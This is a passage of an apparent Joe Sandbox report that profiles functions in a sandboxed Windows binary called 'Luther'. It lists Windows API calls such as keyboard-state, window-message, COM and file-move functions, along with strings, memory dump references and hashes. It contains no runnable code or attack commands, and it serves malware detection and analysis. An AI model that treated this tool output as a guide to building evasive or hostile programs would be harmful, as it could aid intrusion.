GetCPInfo.KERNEL32(00000000,00000000,?,7FFFFFFF,?,?,00E71B7B,00000000,00000000,?,00000000,?,?,?,?,00000000), ref: 00E7194E
MultiByteToWideChar.KERNEL32(00000000,00000009,00000000,00000000,00000000,00000000,?,00E71B7B,00000000,00000000,?,00000000,?,?,?,?), ref: 00E719D1
MultiByteToWideChar.KERNEL32(00000000,00000001,00000000,00000000,00000000,00E71B7B,?,00E71B7B,00000000,00000000,?,00000000,?,?,?,?), ref: 00E71A64
MultiByteToWideChar.KERNEL32(00000000,00000009,00000000,00000000,00000000,00000000,?,00E71B7B,00000000,00000000,?,00000000,?,?,?,?), ref: 00E71A7B

Part of subcall function 00E63B93: RtlAllocateHeap.NTDLL(00000000,?,?,?,00E56A79,?,0000015D,?,?,?,?,00E585B0,000000FF,00000000,?,?), ref: 00E63BC5

MultiByteToWideChar.KERNEL32(00000000,00000001,00000000,00000000,00000000,00000000,?,00E71B7B,00000000,00000000,?,00000000,?,?,?,?), ref: 00E71AF7
__freea.LIBCMT ref: 00E71B22
__freea.LIBCMT ref: 00E71B2E

Memory Dump Source

Source File: 0000000D.00000002.4496298656.0000000000E31000.00000020.00000001.01000000.00000008.sdmp, Offset: 00E30000, based on PE: true

Associated: 0000000D.00000002.4496278367.0000000000E30000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000D.00000002.4496351455.0000000000ECD000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000D.00000002.4496351455.0000000000EF3000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000D.00000002.4496401468.0000000000EFD000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000D.00000002.4496429419.0000000000F05000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_e30000_Luther.jbxd

Similarity

API ID: ByteCharMultiWide$__freea$AllocateHeapInfo
String ID:
API String ID: 2829977744-0
Opcode ID: 9f3ffee20cda886a4d3f61f1d519a1843a09a3422613006a7cf325ffc74632a3
Instruction ID: b905e9738d00b3b627d54693997b372a68bbb40e56fb3202e9a899ce1496cef5
Opcode Fuzzy Hash: 9f3ffee20cda886a4d3f61f1d519a1843a09a3422613006a7cf325ffc74632a3
Instruction Fuzzy Hash: A891D372E00316AADB208EACCC51EEEBBB5DF49314F18A1A9E909F7180E725CC45C761

Function 00EB4F80 Relevance: 10.8, APIs: 4, Strings: 2, Instructions: 262COMMON

Download Yara Rule

APIs

VariantInit.OLEAUT32(?), ref: 00EB50A5
VariantInit.OLEAUT32(?), ref: 00EB51A6
VariantClear.OLEAUT32(?), ref: 00EB51B0
VariantClear.OLEAUT32(?), ref: 00EB520D

Strings

Null Object assignment in FOR..IN loop, xrefs: 00EB5035, 00EB5163, 00EB521B
Incorrect Object type in FOR..IN loop, xrefs: 00EB5189

Memory Dump Source

Source File: 0000000D.00000002.4496298656.0000000000E31000.00000020.00000001.01000000.00000008.sdmp, Offset: 00E30000, based on PE: true

Associated: 0000000D.00000002.4496278367.0000000000E30000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000D.00000002.4496351455.0000000000ECD000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000D.00000002.4496351455.0000000000EF3000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000D.00000002.4496401468.0000000000EFD000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000D.00000002.4496429419.0000000000F05000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_e30000_Luther.jbxd

Similarity

API ID: Variant$ClearInit
String ID: Incorrect Object type in FOR..IN loop$Null Object assignment in FOR..IN loop
API String ID: 2610073882-625585964
Opcode ID: 88bfb843f40edd0473ea3fcd8f8a54f3d0c3f70357698e7115be3b062ba8ad6a
Instruction ID: 4d50ba279161430eb52fd0a503fd1bb6b272eb4885debccb84386bfde14847f7
Opcode Fuzzy Hash: 88bfb843f40edd0473ea3fcd8f8a54f3d0c3f70357698e7115be3b062ba8ad6a
Instruction Fuzzy Hash: D8918B72A01A19ABDF24CFA4CC48FEFBBB8AF45314F109569F515BB280D7709945CBA0

Function 00EA1B46 Relevance: 10.8, APIs: 7, Instructions: 254COMMON

Download Yara Rule

APIs

SafeArrayGetVartype.OLEAUT32(00000000,?), ref: 00EA1C1B
SafeArrayAccessData.OLEAUT32(00000000,?), ref: 00EA1C43
SafeArrayUnaccessData.OLEAUT32(00000000), ref: 00EA1C67
SafeArrayAccessData.OLEAUT32(00000000,?), ref: 00EA1C97
SafeArrayAccessData.OLEAUT32(00000000,?), ref: 00EA1D1E
SafeArrayAccessData.OLEAUT32(00000000,?), ref: 00EA1D83
SafeArrayAccessData.OLEAUT32(00000000,?), ref: 00EA1DEF

Memory Dump Source

Source File: 0000000D.00000002.4496298656.0000000000E31000.00000020.00000001.01000000.00000008.sdmp, Offset: 00E30000, based on PE: true

Associated: 0000000D.00000002.4496278367.0000000000E30000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000D.00000002.4496351455.0000000000ECD000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000D.00000002.4496351455.0000000000EF3000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000D.00000002.4496401468.0000000000EFD000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000D.00000002.4496429419.0000000000F05000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_e30000_Luther.jbxd

Similarity

API ID: ArraySafe$Data$Access$UnaccessVartype
String ID:
API String ID: 2550207440-0
Opcode ID: c39261538b4fac87e60e56051efe896fd13089fac153312cd9fcc56ef839e04a
Instruction ID: 2322c450c8f74b480fc3d9624d2cd7825b085fbbec7bab139861a50f5632f275
Opcode Fuzzy Hash: c39261538b4fac87e60e56051efe896fd13089fac153312cd9fcc56ef839e04a
Instruction Fuzzy Hash: EA91EF71A002189FDB049FA4C884BBEB7F4FF0A726F14A0A9E951FB291D775B905CB50

Function 00EB43A4 Relevance: 10.7, APIs: 4, Strings: 2, Instructions: 240COMMON

Download Yara Rule

APIs

VariantInit.OLEAUT32(?), ref: 00EB43C8
CharUpperBuffW.USER32(?,?), ref: 00EB44D7
_wcslen.LIBCMT ref: 00EB44E7
VariantClear.OLEAUT32(?), ref: 00EB467C

Part of subcall function 00EA169E: VariantInit.OLEAUT32(00000000), ref: 00EA16DE
Part of subcall function 00EA169E: VariantCopy.OLEAUT32(?,?), ref: 00EA16E7
Part of subcall function 00EA169E: VariantClear.OLEAUT32(?), ref: 00EA16F3

Strings

AUTOIT.ERROR, xrefs: 00EB44DD, 00EB44E2
Incorrect Parameter format, xrefs: 00EB4403, 00EB45FE

Memory Dump Source

Source File: 0000000D.00000002.4496298656.0000000000E31000.00000020.00000001.01000000.00000008.sdmp, Offset: 00E30000, based on PE: true

Associated: 0000000D.00000002.4496278367.0000000000E30000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000D.00000002.4496351455.0000000000ECD000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000D.00000002.4496351455.0000000000EF3000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000D.00000002.4496401468.0000000000EFD000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000D.00000002.4496429419.0000000000F05000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_e30000_Luther.jbxd

Similarity

API ID: Variant$ClearInit$BuffCharCopyUpper_wcslen
String ID: AUTOIT.ERROR$Incorrect Parameter format
API String ID: 4137639002-1221869570
Opcode ID: dae2c318dbade7e482ea4338519e7157249231dc819b98a8c163ed209b48d70b
Instruction ID: c74cc70bb3604efbe4f67bc68886fcce00c49e9061a3f713cdbae4799c58490c
Opcode Fuzzy Hash: dae2c318dbade7e482ea4338519e7157249231dc819b98a8c163ed209b48d70b
Instruction Fuzzy Hash: 7E916AB46083019FC714DF24C5849AABBE5FF89314F14992DF98AA7392DB31ED06CB42

Function 00EB560A Relevance: 10.7, APIs: 5, Strings: 1, Instructions: 236COMMON

Download Yara Rule

APIs

Part of subcall function 00E908FE: CLSIDFromProgID.OLE32(?,?,?,00000000,?,?,?,-C000001E,00000001,?,00E90831,80070057,?,?,?,00E90C4E), ref: 00E9091B
Part of subcall function 00E908FE: ProgIDFromCLSID.OLE32(?,00000000,?,?,?,00000000,?,?,?,-C000001E,00000001,?,00E90831,80070057,?,?), ref: 00E90936
Part of subcall function 00E908FE: lstrcmpiW.KERNEL32(?,00000000,?,?,?,00000000,?,?,?,-C000001E,00000001,?,00E90831,80070057,?,?), ref: 00E90944
Part of subcall function 00E908FE: CoTaskMemFree.OLE32(00000000,?,00000000,?,?,?,00000000,?,?,?,-C000001E,00000001,?,00E90831,80070057,?), ref: 00E90954

CoInitializeSecurity.OLE32(00000000,000000FF,00000000,00000000,00000002,00000003,00000000,00000000,00000000,00000001,?,?), ref: 00EB56AE
_wcslen.LIBCMT ref: 00EB57B6
CoCreateInstanceEx.OLE32(?,00000000,00000015,?,00000001,?), ref: 00EB582C
CoTaskMemFree.OLE32(?), ref: 00EB5837

Strings

NULL Pointer assignment, xrefs: 00EB5880, 00EB58AF

Memory Dump Source

Source File: 0000000D.00000002.4496298656.0000000000E31000.00000020.00000001.01000000.00000008.sdmp, Offset: 00E30000, based on PE: true

Associated: 0000000D.00000002.4496278367.0000000000E30000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000D.00000002.4496351455.0000000000ECD000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000D.00000002.4496351455.0000000000EF3000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000D.00000002.4496401468.0000000000EFD000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000D.00000002.4496429419.0000000000F05000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_e30000_Luther.jbxd

Similarity

API ID: FreeFromProgTask$CreateInitializeInstanceSecurity_wcslenlstrcmpi
String ID: NULL Pointer assignment
API String ID: 614568839-2785691316
Opcode ID: 585085d3fde6e7ffb3a0a82d19cd7ccd303038c9e2302c436b41cfad74cd7f23
Instruction ID: 070365cf3be94f78301c574f9aa3b65b5c3a71043b540c9342b9ba4227c2307b
Opcode Fuzzy Hash: 585085d3fde6e7ffb3a0a82d19cd7ccd303038c9e2302c436b41cfad74cd7f23
Instruction Fuzzy Hash: BF91F472D00219EFDF14DFA4DC81AEEBBB8AF08304F10556AE915B7251DB719A45CFA0

Function 00EC2B99 Relevance: 10.7, APIs: 7, Instructions: 196windowCOMMON

Download Yara Rule

APIs

GetMenu.USER32(?), ref: 00EC2C1F
GetMenuItemCount.USER32(00000000), ref: 00EC2C51
GetMenuStringW.USER32(00000000,00000000,?,00007FFF,00000400), ref: 00EC2C79
_wcslen.LIBCMT ref: 00EC2CAF
GetMenuItemID.USER32(?,?), ref: 00EC2CE9
GetSubMenu.USER32(?,?), ref: 00EC2CF7

Part of subcall function 00E94393: GetWindowThreadProcessId.USER32(?,00000000), ref: 00E943AD
Part of subcall function 00E94393: GetCurrentThreadId.KERNEL32 ref: 00E943B4
Part of subcall function 00E94393: AttachThreadInput.USER32(00000000,?,00000000,00000000,?,00E92F00), ref: 00E943BB

PostMessageW.USER32(?,00000111,00000000,00000000), ref: 00EC2D7F

Part of subcall function 00E9F292: Sleep.KERNEL32 ref: 00E9F30A

Memory Dump Source

Source File: 0000000D.00000002.4496298656.0000000000E31000.00000020.00000001.01000000.00000008.sdmp, Offset: 00E30000, based on PE: true

Associated: 0000000D.00000002.4496278367.0000000000E30000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000D.00000002.4496351455.0000000000ECD000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000D.00000002.4496351455.0000000000EF3000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000D.00000002.4496401468.0000000000EFD000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000D.00000002.4496429419.0000000000F05000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_e30000_Luther.jbxd

Similarity

API ID: Menu$Thread$Item$AttachCountCurrentInputMessagePostProcessSleepStringWindow_wcslen
String ID:
API String ID: 4196846111-0
Opcode ID: bfaf4f9bafb326ce5fa0a5bd684ef65a700ee70f2638111b422e3ab2bd3e726a
Instruction ID: f94cc8b1fa5d3fdb49d8c9a2236038dfcf771e8062a3d7c2929dd5ffa219dd4b
Opcode Fuzzy Hash: bfaf4f9bafb326ce5fa0a5bd684ef65a700ee70f2638111b422e3ab2bd3e726a
Instruction Fuzzy Hash: B4716975A00205AFCB14EF64C945FAEBBF1AF48314F10986DE916BB351DB36A942CB90

Function 00EC88F9 Relevance: 10.7, APIs: 7, Instructions: 193windowCOMMON

Download Yara Rule

APIs

IsWindow.USER32(00000000), ref: 00EC8992
IsWindowEnabled.USER32(00000000), ref: 00EC899E
SendMessageW.USER32(00000000,0000041C,00000000,00000000), ref: 00EC8A79
SendMessageW.USER32(00000000,000000B0,?,?), ref: 00EC8AAC
IsDlgButtonChecked.USER32(?,00000000), ref: 00EC8AE4
GetWindowLongW.USER32(00000000,000000EC), ref: 00EC8B06
SendMessageW.USER32(?,000000A1,00000002,00000000), ref: 00EC8B1E

Memory Dump Source

Source File: 0000000D.00000002.4496298656.0000000000E31000.00000020.00000001.01000000.00000008.sdmp, Offset: 00E30000, based on PE: true

Associated: 0000000D.00000002.4496278367.0000000000E30000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000D.00000002.4496351455.0000000000ECD000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000D.00000002.4496351455.0000000000EF3000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000D.00000002.4496401468.0000000000EFD000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000D.00000002.4496429419.0000000000F05000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_e30000_Luther.jbxd

Similarity

API ID: MessageSendWindow$ButtonCheckedEnabledLong
String ID:
API String ID: 4072528602-0
Opcode ID: 52914062a36b0e4c7c45eb92449969eaddbfc820200c2e4859aed1e643793621
Instruction ID: 5cc2be598a76c821bac74d68b406fc97d4e264f3d770df87868db26ffac60479
Opcode Fuzzy Hash: 52914062a36b0e4c7c45eb92449969eaddbfc820200c2e4859aed1e643793621
Instruction Fuzzy Hash: 4D718B74604204AFDB21DF55CB84FBABBB5EF49304F14246EE84577261CB32AD86DB11

Function 00E9B881 Relevance: 10.7, APIs: 7, Instructions: 162windowCOMMON

Download Yara Rule

APIs

GetParent.USER32(?), ref: 00E9B8C0
GetKeyboardState.USER32(?), ref: 00E9B8D5
SetKeyboardState.USER32(?), ref: 00E9B936
PostMessageW.USER32(?,00000101,00000010,?), ref: 00E9B964
PostMessageW.USER32(?,00000101,00000011,?), ref: 00E9B983
PostMessageW.USER32(?,00000101,00000012,?), ref: 00E9B9C4
PostMessageW.USER32(?,00000101,0000005B,?), ref: 00E9B9E7

Memory Dump Source

Source File: 0000000D.00000002.4496298656.0000000000E31000.00000020.00000001.01000000.00000008.sdmp, Offset: 00E30000, based on PE: true

Associated: 0000000D.00000002.4496278367.0000000000E30000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000D.00000002.4496351455.0000000000ECD000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000D.00000002.4496351455.0000000000EF3000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000D.00000002.4496401468.0000000000EFD000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000D.00000002.4496429419.0000000000F05000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_e30000_Luther.jbxd

Similarity

API ID: MessagePost$KeyboardState$Parent
String ID:
API String ID: 87235514-0
Opcode ID: d352ccef694acbac1f41ddd8a47d2219d71251b218f3898ff035b93af9ae9fb0
Instruction ID: 67dfce0148155073a367fd3e9451254b5f3b9068601a9f254dfd692ed7d24ffe
Opcode Fuzzy Hash: d352ccef694acbac1f41ddd8a47d2219d71251b218f3898ff035b93af9ae9fb0
Instruction Fuzzy Hash: 425122A06187D53EFF364234DD45BBABEA95F46308F089489E1D9A58D2C3D8ECC8D750

Function 00E9B6A1 Relevance: 10.7, APIs: 7, Instructions: 161windowCOMMON

Download Yara Rule

APIs

GetParent.USER32(00000000), ref: 00E9B6E0
GetKeyboardState.USER32(?), ref: 00E9B6F5
SetKeyboardState.USER32(?), ref: 00E9B756
PostMessageW.USER32(00000000,00000100,00000010,?), ref: 00E9B782
PostMessageW.USER32(00000000,00000100,00000011,?), ref: 00E9B79F
PostMessageW.USER32(00000000,00000100,00000012,?), ref: 00E9B7DE
PostMessageW.USER32(00000000,00000100,0000005B,?), ref: 00E9B7FF

Memory Dump Source

Source File: 0000000D.00000002.4496298656.0000000000E31000.00000020.00000001.01000000.00000008.sdmp, Offset: 00E30000, based on PE: true

Associated: 0000000D.00000002.4496278367.0000000000E30000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000D.00000002.4496351455.0000000000ECD000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000D.00000002.4496351455.0000000000EF3000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000D.00000002.4496401468.0000000000EFD000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000D.00000002.4496429419.0000000000F05000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_e30000_Luther.jbxd

Similarity

API ID: MessagePost$KeyboardState$Parent
String ID:
API String ID: 87235514-0
Opcode ID: e9e174caf526b5a6c68931f9a8b40c989a28cfa0fba3942070991c4f5be400fb
Instruction ID: e9a2c903f8fc9d60ec210a4e8bcbe4b29001450a4318b7f11f5c81f5094652ee
Opcode Fuzzy Hash: e9e174caf526b5a6c68931f9a8b40c989a28cfa0fba3942070991c4f5be400fb
Instruction Fuzzy Hash: A95136A09083D53DFF368374DD55BBABEA95F45308F0C968AE0D46A8C2D394EC88D750

Function 00E657A1 Relevance: 10.7, APIs: 7, Instructions: 152fileCOMMONLIBRARYCODE

Download Yara Rule

APIs

GetConsoleCP.KERNEL32(FF8BC35D,00000000,?,?,?,?,?,?,?,00E65F16,?,00000000,FF8BC35D,00000000,00000000,FF8BC369), ref: 00E657E3
__fassign.LIBCMT ref: 00E6585E
__fassign.LIBCMT ref: 00E65879
WideCharToMultiByte.KERNEL32(?,00000000,00000000,00000001,FF8BC35D,00000005,00000000,00000000), ref: 00E6589F
WriteFile.KERNEL32(?,FF8BC35D,00000000,00E65F16,00000000,?,?,?,?,?,?,?,?,?,00E65F16,?), ref: 00E658BE
WriteFile.KERNEL32(?,?,00000001,00E65F16,00000000,?,?,?,?,?,?,?,?,?,00E65F16,?), ref: 00E658F7

Memory Dump Source

Source File: 0000000D.00000002.4496298656.0000000000E31000.00000020.00000001.01000000.00000008.sdmp, Offset: 00E30000, based on PE: true

Associated: 0000000D.00000002.4496278367.0000000000E30000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000D.00000002.4496351455.0000000000ECD000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000D.00000002.4496351455.0000000000EF3000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000D.00000002.4496401468.0000000000EFD000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000D.00000002.4496429419.0000000000F05000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_e30000_Luther.jbxd

Similarity

API ID: FileWrite__fassign$ByteCharConsoleMultiWide
String ID:
API String ID: 1324828854-0
Opcode ID: ae832f3b9ca0e6ddc6b41063efce62b7f93d8163b3085392aa6d0ac866540b6f
Instruction ID: 9609b4ac4e0efe716675c86d90dcea1d75910cfbd901e8c97a6d7e4cf07808a4
Opcode Fuzzy Hash: ae832f3b9ca0e6ddc6b41063efce62b7f93d8163b3085392aa6d0ac866540b6f
Instruction Fuzzy Hash: 0C51CE72A406499FCB10CFA8EC85AEEBBF8FF49350F14412AE951F7291D7309A41CB60

Function 00E319CD Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 121keyboardCOMMON

Download Yara Rule

APIs

GetCursorPos.USER32(?), ref: 00E319E1
ScreenToClient.USER32(00000000,?), ref: 00E319FE
GetAsyncKeyState.USER32(00000001), ref: 00E31A23
GetAsyncKeyState.USER32(00000002), ref: 00E31A3D

Strings

$', xrefs: 00E319F0, 00E31A07, 00E731C3, 00E73164, 00E73135

Memory Dump Source

Source File: 0000000D.00000002.4496298656.0000000000E31000.00000020.00000001.01000000.00000008.sdmp, Offset: 00E30000, based on PE: true

Associated: 0000000D.00000002.4496278367.0000000000E30000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000D.00000002.4496351455.0000000000ECD000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000D.00000002.4496351455.0000000000EF3000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000D.00000002.4496401468.0000000000EFD000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000D.00000002.4496429419.0000000000F05000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_e30000_Luther.jbxd

Similarity

API ID: AsyncState$ClientCursorScreen
String ID: $'
API String ID: 4210589936-3149202309
Opcode ID: 87ded62d213d2c204c545987b66721a0a4c68e14f8c2704594dff31e59bace5a
Instruction ID: 80c1f5b83993ca78701717fa23703b88af735fc6d1b1293018f665a8dd8b03cb
Opcode Fuzzy Hash: 87ded62d213d2c204c545987b66721a0a4c68e14f8c2704594dff31e59bace5a
Instruction Fuzzy Hash: 9F419E71A0520AFFDF15DF64C848BEEBBB4FB05325F20926AE429B2290C7316A54DB51

Function 00E53090 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 117COMMON

Download Yara Rule

APIs

_ValidateLocalCookies.LIBCMT ref: 00E530BB
___except_validate_context_record.LIBVCRUNTIME ref: 00E530C3
_ValidateLocalCookies.LIBCMT ref: 00E53151
__IsNonwritableInCurrentImage.LIBCMT ref: 00E5317C
_ValidateLocalCookies.LIBCMT ref: 00E531D1

Strings

csm, xrefs: 00E53166

Memory Dump Source

Source File: 0000000D.00000002.4496298656.0000000000E31000.00000020.00000001.01000000.00000008.sdmp, Offset: 00E30000, based on PE: true

Associated: 0000000D.00000002.4496278367.0000000000E30000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000D.00000002.4496351455.0000000000ECD000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000D.00000002.4496351455.0000000000EF3000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000D.00000002.4496401468.0000000000EFD000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000D.00000002.4496429419.0000000000F05000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_e30000_Luther.jbxd

Similarity

API ID: CookiesLocalValidate$CurrentImageNonwritable___except_validate_context_record
String ID: csm
API String ID: 1170836740-1018135373
Opcode ID: 4285e9fcf1cc72bbe6ae82dab7ca9877a8f8090dcbdce2e1ba0cc20016df893e
Instruction ID: 04fc2050083b2f1af985b4a89bf77d2688d2d7bf4eab2b734e20ca88f1c9e9c6
Opcode Fuzzy Hash: 4285e9fcf1cc72bbe6ae82dab7ca9877a8f8090dcbdce2e1ba0cc20016df893e
Instruction Fuzzy Hash: 2441B534A012089BCF10DF78C881AAEBBB5AF45399F149955EC157B392D731DB09CB91

Function 00E9D7AB Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 108filestringCOMMON

Download Yara Rule

APIs

Part of subcall function 00E9E6F7: GetFullPathNameW.KERNEL32(00000000,00007FFF,?,?,?,?,?,?,00E9D7CD,?), ref: 00E9E714

Part of subcall function 00E9E6F7: GetFullPathNameW.KERNEL32(?,00007FFF,?,?,?,?,?,00E9D7CD,?), ref: 00E9E72D

lstrcmpiW.KERNEL32(?,?), ref: 00E9D7F0
MoveFileW.KERNEL32(?,?), ref: 00E9D82A
_wcslen.LIBCMT ref: 00E9D8B0
_wcslen.LIBCMT ref: 00E9D8C6
SHFileOperationW.SHELL32(?), ref: 00E9D90C

Strings

\*.*, xrefs: 00E9D89E

Memory Dump Source

Source File: 0000000D.00000002.4496298656.0000000000E31000.00000020.00000001.01000000.00000008.sdmp, Offset: 00E30000, based on PE: true

Associated: 0000000D.00000002.4496278367.0000000000E30000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000D.00000002.4496351455.0000000000ECD000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000D.00000002.4496351455.0000000000EF3000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000D.00000002.4496401468.0000000000EFD000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000D.00000002.4496429419.0000000000F05000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_e30000_Luther.jbxd

Similarity

API ID: FileFullNamePath_wcslen$MoveOperationlstrcmpi
String ID: \*.*
API String ID: 3164238972-1173974218
Opcode ID: eb02f70a18e8db81e5f4dc0c38d0fd756da2e867841d3c93acddc645013a1720
Instruction ID: 0cb754acf5d6f5f921cd8342f4bf4d55d333f1808b74ee185c769019e83ca0ac
Opcode Fuzzy Hash: eb02f70a18e8db81e5f4dc0c38d0fd756da2e867841d3c93acddc645013a1720
Instruction Fuzzy Hash: F34167719052289EDF16EFA4CD85EDD77F8AF08380F1014EAA605FB152EB75A788CB50

Function 00EC3899 Relevance: 10.6, APIs: 7, Instructions: 99windowCOMMON

Download Yara Rule

APIs

SendMessageW.USER32(?,000000F0,00000000,00000000), ref: 00EC38B8
GetWindowLongW.USER32(?,000000F0), ref: 00EC38EB
GetWindowLongW.USER32(?,000000F0), ref: 00EC3920
SendMessageW.USER32(?,000000F1,00000000,00000000), ref: 00EC3952
SendMessageW.USER32(?,000000F1,00000001,00000000), ref: 00EC397C
GetWindowLongW.USER32(?,000000F0), ref: 00EC398D
SetWindowLongW.USER32(?,000000F0,00000000), ref: 00EC39A7

Memory Dump Source

Source File: 0000000D.00000002.4496298656.0000000000E31000.00000020.00000001.01000000.00000008.sdmp, Offset: 00E30000, based on PE: true

Associated: 0000000D.00000002.4496278367.0000000000E30000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000D.00000002.4496351455.0000000000ECD000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000D.00000002.4496351455.0000000000EF3000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000D.00000002.4496401468.0000000000EFD000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000D.00000002.4496429419.0000000000F05000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_e30000_Luther.jbxd

Similarity

API ID: LongWindow$MessageSend
String ID:
API String ID: 2178440468-0
Opcode ID: 9a15e1b326938edb3585888ef4d07af7904a3b385ceb844e84078a9d10ca3b04
Instruction ID: 3458ca73e7be835a1d28d7f2ab17b0532a35936936760acaabc68b0527b2f743
Opcode Fuzzy Hash: 9a15e1b326938edb3585888ef4d07af7904a3b385ceb844e84078a9d10ca3b04
Instruction Fuzzy Hash: 47319A35704255AFDB21CF29DD88F6437E0FB8A314F146168F500AB2B5CB72AD86EB11

Function 00E9808D Relevance: 10.6, APIs: 7, Instructions: 94memoryCOMMON

Download Yara Rule

APIs

MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,00000000,00000000), ref: 00E980D0
MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,00000000,00000000), ref: 00E980F6
SysAllocString.OLEAUT32(00000000), ref: 00E980F9
SysAllocString.OLEAUT32(?), ref: 00E98117
SysFreeString.OLEAUT32(?), ref: 00E98120
StringFromGUID2.OLE32(?,?,00000028), ref: 00E98145
SysAllocString.OLEAUT32(?), ref: 00E98153

Memory Dump Source

Source File: 0000000D.00000002.4496298656.0000000000E31000.00000020.00000001.01000000.00000008.sdmp, Offset: 00E30000, based on PE: true

Associated: 0000000D.00000002.4496278367.0000000000E30000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000D.00000002.4496351455.0000000000ECD000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000D.00000002.4496351455.0000000000EF3000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000D.00000002.4496401468.0000000000EFD000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000D.00000002.4496429419.0000000000F05000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_e30000_Luther.jbxd

Similarity

API ID: String$Alloc$ByteCharMultiWide$FreeFrom
String ID:
API String ID: 3761583154-0
Opcode ID: 421114c4c612735f3cfcef8b9f6bfba91697e5bbb8d882e57950dc84de3c81dd
Instruction ID: 4b437940e076f36796ba19dae39d5a39dc0fe8acf73a7dd5193034f430bd5a6e
